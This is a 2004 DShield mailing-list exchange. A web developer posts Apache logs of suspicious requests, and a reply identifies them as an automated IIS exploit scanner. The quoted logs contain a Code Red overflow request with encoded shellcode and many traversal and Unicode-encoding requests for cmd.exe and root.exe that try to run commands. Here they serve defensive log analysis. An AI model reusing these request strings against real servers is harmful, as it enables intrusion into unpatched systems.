[Dshield] Suspect HTTP-activity

Al Reust areust at comcast.net
Sat Jan 24 01:48:38 GMT 2004


Interesting in that now one else said this..

While someone mentioned Code Red they did not mention some of the other 
"Quick Tools"  to topple an unprotected IIS Server.

This what I would expect from a script kiddie probing to see what they can 
grab (as it responded to port 80). It appears to be a tool that combines 
the "most popular exploits," single pass on an IP Address.

Most IIS SysAdmins would have removed unwanted extensions/ISAPI filters 
and/or used the IISLockdown Tool and Installed URLScan.. Those that have 
not, would be toppled. So yes this is a "Windows" based attack.

Al

At 07:30 PM 1/23/2004 +0100, you wrote:
>Hello,
>I'm a fresh subscriber to this list and the very reason I stumbled upon it 
>was that I was investigating some activity that apache logged and that 
>made me a little supicious about the intentions behind the requests. So 
>first of, Hello!
>
>I've been trying to go through the most recent archives and while what you 
>discuss seems to be both interesting and important, I haven't found 
>anything that match my query.
>
>If this is the wrong place for my question, I can take pointers to other 
>lists/sites for an answer. :-)
>
>Below are excerpts from my apache/access.log (I'm running Win2000Pro). I 
>haven't publicly announced my web-server in any way -- I just use it for 
>development of web-code and invite other developers to check it out.
>
>Most of these logs seems to indicate nothing actually happened 
>(404-status), but I'm curious as to what it's all about and if anyone 
>might be interested in this information. Any DShield-like service that 
>collects apache-logs? ;-)
>
>Most of these requests seems to be someone wanting to list my disk.
>
>Are there any known worms that create these requests? Should I act in any way?
>
>Any help is much appreciated!
>
>If anyone wants me to post more logs, I can do so (it's basically just the 
>same requests a couple of times)
>
>Martin
>
>218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET 
>/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
>HTTP/1.0" 404 308
>127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1" 404 320
>210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET 
>/scripts/nsiislog.dll" 404 -
>202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/root.exe?/c+dir HTTP/1.0" 404 307
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 305
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 346
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 346
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 362
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
>194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
>
>_______________________________________________
>list mailing list
>list at dshield.org
>To change your subscription options (or unsubscribe), see: 
>http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list